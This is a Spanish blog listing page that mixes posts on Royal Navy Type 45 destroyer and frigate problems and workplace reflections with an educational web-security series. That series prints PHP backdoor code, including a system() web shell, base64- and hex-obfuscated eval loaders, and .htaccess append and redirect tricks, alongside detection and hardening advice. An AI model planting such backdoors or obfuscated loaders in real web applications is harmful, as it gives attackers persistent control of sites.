Blog

RESOLVER LOS PROBLEMAS DE PROPULSIÓN DE LOS DESTRUCTORES TIPO 45 DE LA RN COSTARÁ MÁS DE 225 MILLONES DE DÓLARES

23.03.2018 09:31
 
Finalmente los problemas de los destructores Tipo 45 británicos están siendo admitidos oficialmente y surgen más detalles sobre los mismos.
 
Así se supo que la empresa encargada de resolver los problemas será BAE Systems y que los trabajos costarán al contribuyente británco algo más de $ 225 millones de dólares. Las obras que se realizarán serán la segunda parte de un programa de dos fases llamado Proyecto Napier, cuyo objetivo es resolver de una vez por todas los problemas de propulsión de los destructores antiaéreos británicos. 
 
Las tareas implicarán el reemplazo de los dos generadores diésel con los que ya cuentan los buques y el agregado de un tercero. Esto obligará al corte de los cascos de las naves. 
 
Tal como muchos habían sugerido el problema de los generadores no es el único ni siquiera el principal causante del colapso de la propulsión de los Type 45 en aguas cálidas. Hay un componente adicional, "llamado intercooler-recuperator" en las turbinas de gas. Este componente toma el calor que produce el motor y lo usa para mejorar la eficiencia del sistema en general. Al redirigir esa energía a mantener las otras partes frías. El problema es que no funciona como estaba previsto. 
 
En definitva y para resumir, el primer destructor debería estar modificado en el año 2021. El costo de las modificaciones implicará más presión a una Royal Navy que ya sufre todo tipo de problemas finacieros y que enfrenta las consecuencias del Brexit y - al menos en parte - los del resurgimiento militar ruso. Según algunos analistas cualquier complicación en el Proyecto Napier podría llevar el rojo de la Defensa británica a niveles insostenibles.
 
Recordemos que los problemas de los Tipo 45 son tan serios que ya al menos en dos oportunidades todos estuvieron en puerto al mismo tiempo. En diciembre del 2017 informábamos que los seis destructores se encontraban en la base de Portsmouth. En julio del 2016 se había dado una situación similar. La clases "Daring" terminó siendo tan problemática como costosa.
 
Artículos relacionados:
 

LA EMPRESA: REFLEXIONES ANTE EL ÉXODO DE EMPLEADOS

22.03.2018 19:51
 
Los cambios siguen en la empresa en la que trabajo y las renuncias también, es que si se quiere conservar a los trabajadores se debe poner atención al trato que se les da y más aún cuando se les reconoce algún talento y la empresa puede resultar beneficiada con el mismo; entonces los jefes deben trabajar y lograr que sean los trabajadores los que quieran formar parte de la empresa.  
 
Los empleados - algunos de ellos muy buenos - presentan sus renuncias y a los jefes sólo les queda quejarse por estos hechos ante Recursos Humanos ya que después de una inversión de tiempo y preparación los deben dejar ir, afectando directamente al desarrollo de la empresa. Después de ver esto de cerca puedo decir por qué renuncian a sus puestos de trabajo:
 

    - Porque los cargan con demasiado trabajo (lo que a menudo los obliga a realizar jornadas muy largas).

    - No ven un buen líder en su jefe.

    - No les entregan el manual de funciones.

    - No les reconocen el trabajo bien realizado.

    - Los sueldos son bajos en comparación con el mercado.

    - El ambiente laboral dista de ser el óptimo.

 
Los empleadores deben darse cuenta de que los empleado no son máquina de trabajar: tiene necesidades, expectativas, aspiraciones, ilusiones y una vida que no comienza ni termina en la empresa. Si no se tienen en cuenta estos factores y sólo se ve el beneficio económico inmediato, a mediano y largo plazo la empresa se deteriorará en su capacidad e imagen. Es inútil llorar sobre la leche derramada, se cosecha lo que se siembra.
 
Artículos relacionados:
 

VULNERABILIDADES DE APLICACIONES WEB: SUBIDA DE ARCHIVOS PELIGROSOS (V) - PUERTAS TRASERAS (II)

21.03.2018 08:24
 
El pirata informático podría recurrir a algo más complejo o menos común que una codificación Base64 para intentar ocultar la verdadera funcionalidad de su código. 
 
<?php 
function decodificar($hexadecimal){
 
//a continuación se divida la cadena hexadecimal, se convierte cada par de caracteres a su correspondiente carácter ASCII y se 
evalúa la cadena resultante como código PHP mediante la función eval(), lo que resultará en la ejecución del código.
 
for ($i=0; $i < strlen($hexadecimal)-1; $i+=2){ 
$cadena .= chr(hexdec($hexadecimal[$i].$hexadecimal[$i+1])); 
eval($cadena); 
 
decodificar('73797374656d28226c73202d6c6122293b')
// en Windows será: decodificar('73797374656d282264697222293b');  
?>
 
Si cambiamos el comentario y lo nombres de la función, variables y parámetros será difícil determinar qué es lo que hace el script:
 
<?php function principal($uno){for ($i=0; $i < strlen($uno)-1; $i+=2){$dos .= chr(hexdec($uno[$i].$uno[$i+1]));}eval($dos);}principal('73797374656d28226c73202d6c6122293b');?>
 
Este código además podría ser insertado en algún script ya existente, complicando aún más su detección.
 
En estos casos lo mejor será buscar la función eval() o en su defecto la función assert(), las cuales debería despertar sospechas por sí solas. (ver: geoestrategia.webnode.es/news/vulnerabilidades-de-aplicaciones-web-inyeccion-de-codigo-php-evaluado-dinamicamente-ii/).
 
Artículo relacionado:
 

 

VULNERABILIDADES DE APLICACIONES WEB: SUBIDA DE ARCHIVOS PELIGROSOS (IV) - PUERTAS TRASERAS (I)

19.03.2018 14:48
 
Sin duda subir una puerta trasera es lo primero que un pirata informático hará cuando encuentre una vulnerabilidad de subida de archivos peligrosos y por ende es bueno aprender a reconocerlas para eliminarlas cuanto antes. Será bueno hacer de la búsqueda manual de las mismas un acto de rutina (lo que no excluye otras medidas de seguridad, sólo las complementa).
 
Una puerta trasera es un script malicioso utilizado por un atacante con la intención de escalar y mantener el acceso persistente a una aplicación web ya comprometida. Un hacker puede instalar puertas taseras no solo con una vulnerabilidad de subida de archivos peligrosos  sino también al comprometer aplicaciones web utilizando técnicas como inyección SQL, inclusión remota de archivos, escritura de archivos o mediante credenciales válidas robadas a un administrador. El pirata informático también podrá utilizar como puertas traseras funcionalidades olvidadas  u ocultas (ver: geoestrategia.webnode.es/news/vulnerabilidades-de-aplicaciones-web-funcionalidades-olvidadas-y-funcionalidades-ocultas/).
 
En su forma más simple la puerta trasera puede ser algo así:
 
<?php system($_GET['comando']); ?>
 
aunque habitualmente habrá algún intento por disimular la verdera funcionalidad del código:
 
eval(base64_decode("c3lzdGVtKCdscyAtbGEnKTsNCg=="));
 
(en Linux)
 
eval(base64_decode("c3lzdGVtKCdkaXInKTs="));
 
(en Windows).
 
Obviamente se preferirá el método POST sobre el GET, pero el pirata informático también podría recurrir a algo así:
 
<?php system($_SERVER['HTTP_USER_AGENT']); ?>
 
ya que el agente de usuario (user agent) es muy fácil de manipular y de, en este caso, cambiar por un comando. 
 

LA EMPRESA: LOS CERTIFICADOS DE TRABAJO

16.03.2018 20:19
 
He sido testigo de la molestia que causó recibir un certificado de trabajo, la interesada decía que era un documento muy simple ya que sólo contenía los nombres y el período en el que laboró en la empresa. Lo cierto es que para una futura contratación algunos empleadores exigen sustentar no sólo los períodos trabajados sino también su experiencia y los puestos para los que ha sido contratado.
 
Está claro que en Perú el empleador está obligado a entregar un certificado laboral al personal cesado dentro de las 48 horas de terminada la relación laboral pero no está en la obligación de describir el puesto desempeñado ni su rendimiento y comportamiento. Sin embargo, el interesado podría solicitar un certificado más detallado y su pedido podría ser evaluado por el área de Recursos Humanos que si lo considera pertinente lo puede entregar, más aún cuando la persona que ha dejado de laborar a la empresa ha prestado servicios desempeñando un buen cargo.
 
Un certificado de trabajo no es determinante para conseguir un nuevo empleo, es una referencia que sumada a otros certificados, experiencia comprobada y una buena entrevista de trabajo podría abrir nuevas posibilidades y permitir estar frente a un nuevo empleador. Nada cuesta hacerle ese favor a un trabajador que se esmeró por cumplir con la empresa. 
 

VULNERABILIDADES DE APLICACIONES WEB: LISTAS BLANCAS INAPROPIADAS

15.03.2018 13:01
Tomemos el siguiente archivo .php:
 
<?php
$dir = $_GET['carpeta'];
include($dir . "/accion.php");
?>
 
La intención del programador era que el usuario ingresara el valor "inicio" o "fin" para elegir entre dos acciones o funciones distintas, cada una ejecutada por un script PHP ubicado en una carpeta diferente: 
 
inicio/accion.php
fin/accion.php
 
Sin embargo si en el mismo directorio que "inicio/" y "fin/" se encontrara el subdirectorio "administrador/" con otro archivo "accion.php", el usuario podría ingresar como parámetro "carpeta" el valor "administrador" y ejecutar una acción reservada al mismo. 
 
Hemos dado un ejemplo extremadamente sencillo, el lector podrá complicarlo a gusto. Lo importante es ver que el desarrollador intentó limitar los archivos a ejecutar pero no lo hizo de la forma apropiada. El atacante incluso podría aprovechar alguna vulnerabilidad para crear o subir un archivo con el nombre de "accion.php" e ingresar una ruta totalmente diferente a la esperada:
 
https://127.0.0.1/inclusion-local-archivos/inclusion.php?accion=Unidad de disco:\xampp\htdocs\directorio\subidos\archivos-subidos  
 
El archivo sería incluido y ejecutado sin inconvenientes.
 

LA EMPRESA: EL VERDADERO LIDERAZGO REQUIERE DE PACIENCIA

13.03.2018 19:19
 
En los últimos días he escuchado decir que determinada área de la empresa en la que trabajo no avanza o tiene conflictos y que eso se debe a la falta de compromiso de los involucrados. ¿Qué tan determinante puede ser esto cuando hablando con el personal el mismo expresa que siente que su trabajo no es reconocido?
 
La empresa les provee de celulares, PCs, cuentas de correo electrónico, tecnología para el desarrollo de su trabajo . Están comunicados y conectados, pero no logran comprometerse o es muy poco lo que se sientan comprometidos.
 
¿Si tuvieran sueldos más altos, se lograría mayor compromiso? Pienso que no. Si dudas un buen sueldo es importante, pero creo que no es suficiente para lograr que el personal se sienta motivado y satisfecho en el quehacer diario de su trabajo. Ayudaría más si se reconocieran los logros y si hubiera mejoras en sus condiciones de trabajo.
 
Lo más importante de una empresa es su personal y para que el mismo se sienta parte de la empresa, los jefes deben lograr el trabajo en equipo, deben generar situaciones donde sus colaboradores participen de una manera más activa y también puedan dar sus aportes. También es importante comunicar la misión, visión y valores de la empresa.
 
El personal no es una máquina en la que se colocan insumos y de la cual se saca el producto. Es un grupo de personas a las que hay que integrar en un equipo de trabajo. La motivación será mucho mayor si cada individuo se siente valorado, acompañado en su crecimiento, si cada empleado es capacitado y asesorado por los miembros más experimentados del grupo. Un ambiente de trabajo agradable, el reconocimiento de un logro y el análisis amable de un fracaso contribuirán a alcanzar las metas fijadas. Ser patrón o jefe es mucho más que poner objetivos y pagar un sueldo; un buen líder sabe renunciar a la prisa para construir un grupo de trabajo cohesionado, animado y capaz.
 

VULNERABILIDADES DE APLICACIONES WEB: SUBIDA DE ARCHIVOS PELIGROSOS (III)

12.03.2018 20:21
 
Queremos llamar la atención sobre otra posibilidad que tiene el pirata informático de usar los archivos .htaccess cuando logra subirlos a un sitio.
 
Tomemos la siguiente línea en uno de estos archivos .htaccess:
 
php_value auto_append_file "Unidad de disco:\xampp\htdocs\pruebas\tmp\apendice.php"
 
Dentro de la carpeta "tmp\" (u otra) el hacker subirá o creará (o incluso moverá a la misma) el siguiente archivo "apendice.php":
 
<script>alert('Desfigurado');</script>
 
Ahora cada vez que se ejecute un archivo .php ubicado dentro de la carpeta "pruebas\" ("Unidad de disco:\xampp\htdocs\pruebas\") también se ejecutará el código "<script>alert('Desfigurado');</script>" que se agregará temporariamente al archivo que se esté ejecutando, provocando - en este caso - una desfiguración o "defacement" de la página. Demás está decir que el código agregado podría tener alguna funcionalidad mucho peor.
 
Recomendamos usar los archivos .htaccess sólo cuando no hay otro recurso disponible o como una medida realmente transitoria. Deben ser un recurso extremo. Habrá que aprender a usar los archivos de configuración y fijar las distintas directivas de configuración ahí. 
 
Dimos sólo dos ejemplos del aprovechamiento que puede hacer el pirata informático de los ficheros .htaccess. Las posibilidades que tiene el hacker para sacarles provecho son muchísimas y algunas pueden tener consecuencias muy graves.
 
Recomendamos encarecidamente deshabilitar el uso de estos archivo, los mismos constituyen un peligro que puede desembocar en resultados dramáticos. 
 

LA ROYAL NAVY ESTÁ PERDIENDO BUQUES DE ESCOLTA

11.03.2018 20:02
 
En nuestro artículo del 5 de enero de este años nos preguntábamos si el programa británico de equipamiento militar es viable (geoestrategia.webnode.es/news/¿el-programa-britanico-de-equipamiento-para-la-defensa-es-viable/). Concluíamos el artículo diciendo: "La mancha roja en el presupuesto de defensa del Reino Unido debe ser reducida a menos que se quiera llevar a Gran Bretaña a la bancarrota. No alcanzará con vender algunos buques usados, dar de baja algunos helicópteros y fusionar tropas de élite. La prueba está en que hoy el parlamentario británico John Woodcock usó su cuenta de Twitter para expresar la duda de que se pueda construir el séptimo submarino de ataque de la Clase Astute".
 
Se sabe que la construcción del séptimo submarino de la Clase Astute sigue en peligro de ser cancelada. No faltan quienes afirman que toda la Clase Dreadnought de submarinos portadores de misiles balísticos con ojivas nucleares corre ese mismo peligro. El tiempo dirá, lamentablemente son muchos los intereses en juego y mucho el dinero ya gastado para el desarrollo y el comienenzo de la construcción de estos SSBN.
 
¿Pero qué hay de lo que la Royal Navy ya tiene? Visitamos la página web oficial de la Marina Real británica y cuatro de las fragatas Tipo 23 figuran como "en mantenimiento y pruebas de mar". Dos figuran como "estacionadas en la Base de Devonport", dos como "escoltas de disponibilidad inmediata", una como "llevando a cabo ejercicios de entrenamiento" para volver a operaciones de primera línea y otra como "en aguas del Reino Unido". Si la información es exacta, sólo tres de las trece fragatas Tipo 23 - la espina dorsal de la Royal Navy - están desplegadas fuera del Reino Unido. 
 
Cuando el pasado 22 de febrero un grupo de tareas de buques espías rusos entró en aguas de interés británicas, el mismo fue escoltado por un buque de protección pesquera que abandonó sus tareas específicas para vigilar a las naves rusas. Es cierto que el buque era perfectamente capaz de llevar a cabo la misión encomendada pero también es cierto que abandonó las tareas que estaba realizando para poder hacerlo. Por otra parte la política de la Royal Navy siempre había sido la de emplear buques con mayor poder de fuego para estas operaciones que últimamente suelen quedar en manos de cazaminas y patrulleros.
 
Las cuentas no cierran y hay que economizar. Los buques no navegan, son canibalizados y se van deteriorando. Gran Bretaña es una nación insular y no debería darse el lujo de perder buques de escolta pero lo está haciendo. Los portaaaviones y SSBN están resultando un lujo caro. ¿De qué les sirven dos portaaviones si no tienen aeronaves de ala fija ni escolta adecuada? 
 

VULNERABILIDADES DE APLICACIONES WEB: SUBIDA DE ARCHIVOS PELIGROSOS (II)

09.03.2018 18:24
 
Antes de seguir avanzando con la descripción de más vulnerabilidades de aplicaciones web queremos profundizar en una que ya hemos visto: la Subida de archivos peligrosos. Solemos creer que todos los archivo que suben los piratas informáticos cuando se encuentran con esta vulnerabilidad son puertas traseras y no es así. Una de las acciones que suelen tomar cuando tienen la posibilidad es la de subir archivos .htaccess. Cuando se logra subir un archivo .htaccess el mismo reemplazará automáticamente al que antes se hallaba en el mismo directorio. Esto permite a los hackers tomar diferentes líneas de acción. Como solemos hacer, mostraremos un ejemplo bastante benigno:
 
Un archivo .htaccess con la siguiente línea:
 
Redirect 301 / https://geoestrategia.webnode.es/
 
permitirá redirigir el tráfico desde el directorio en que se encuentre a otro sitio web, en este caso el nuestro, lo cual serviría - por ejemplo - para sumar visitas.
 
Para evitar esta posibilidad conviene deshabilitar por completo los archivos .htaccess.
 
Tomemos el caso de un servidor instalado para el aprendizaje de su administración, en nuestro caso un servidor preconfigurado Apachefriends XAMPP. Busquemos las siguientes líneas en el archivo httpd.conf ("Unidad de disco:\xampp\apache\conf\httpd.conf"):
 
DocumentRoot "Unidad de disco:/xampp/htdocs"
<Directory "Unidad de disco:/xampp/htdocs">
 
Algunos renglones por debajo de ellas encontraremos un comentario muy claro:
 
# AllowOverride controls what directives may be placed in .htaccess files.
 
Lo traducimos para el lector
 
"AllowOverride controla qué directivas pueden ser ubicadas en los archivos .htaccess".
 
Apenas unas líneas debajo de la anterior encontramos la siguiente directiva:
 
AllowOverride All
 
Cambiamos All por None y queda así:
 
AllowOverride None
 
Las directivas de los archivos .htaccess que pudiera haber quedarán sin efecto. Borramos esos archivos y la tarea queda lista.
 
<< 111 | 112 | 113 | 114 | 115 >>

Etiquetas

  1. portaaviones
  2. Wehrmacht
  3. Luftwaffe
  4. Tempest
  5. blindados
  6. bombarderos
  7. artillería
  8. Brasil
  9. submarinos
  10. RAF
  11. patrulleros
  12. British Army
  13. ejercicios
  14. misiles y cohetes
  15. IMARA
  16. EA
  17. portahelicópteros
  18. clase Queen Elizabeth
  19. F-35
  20. avisos
  21. fragatas
  22. tipo 45
  23. destructores
  24. helicópteros
  25. FAA
  26. Orion P3
  27. COAN
  28. ARA
  29. Royal Navy
  30. Malvinas